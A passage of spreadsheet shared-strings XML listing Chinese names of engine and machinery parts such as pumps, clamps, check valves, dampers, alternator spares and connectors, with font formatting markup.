        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热器组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加压泵支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加压冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加压燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加长接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加长喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>枷锁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>枷锁夹具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>枷锁圆盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹臂焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹臂总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹层安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹杆加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧用短管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹具，两部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>合金材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹具环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尖头空心螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间隙</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间隙，主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间隙接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间隙控制气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>监测设备用孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>监测箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>监控设备用前级泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检测工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检测器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检测仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查，桁磨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查袋</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查单，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查阀板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查和维修计划</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查及操纵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查孔盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查孔环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VBS-ODS-AT2000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查维护周期</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检漏过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减负荷装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减径接头，内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减流式法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减速齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减速警报面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减速系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减缩接头衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压器单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压站</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器，调频轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器弹簧套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器节流块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器特点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振支座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振支座，橡胶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震固定件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剪刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建议文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>渐缩焊接座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>渐缩接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键盘指示器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流电动机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机的轴尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机空气出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机冷却管变换接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>胶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度编码器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角形手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绞合电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绞链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绞链杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰配螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰配螺栓（凸轮轴驱动）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接触保护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接触臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接触块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接触面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接地线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接管管壁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
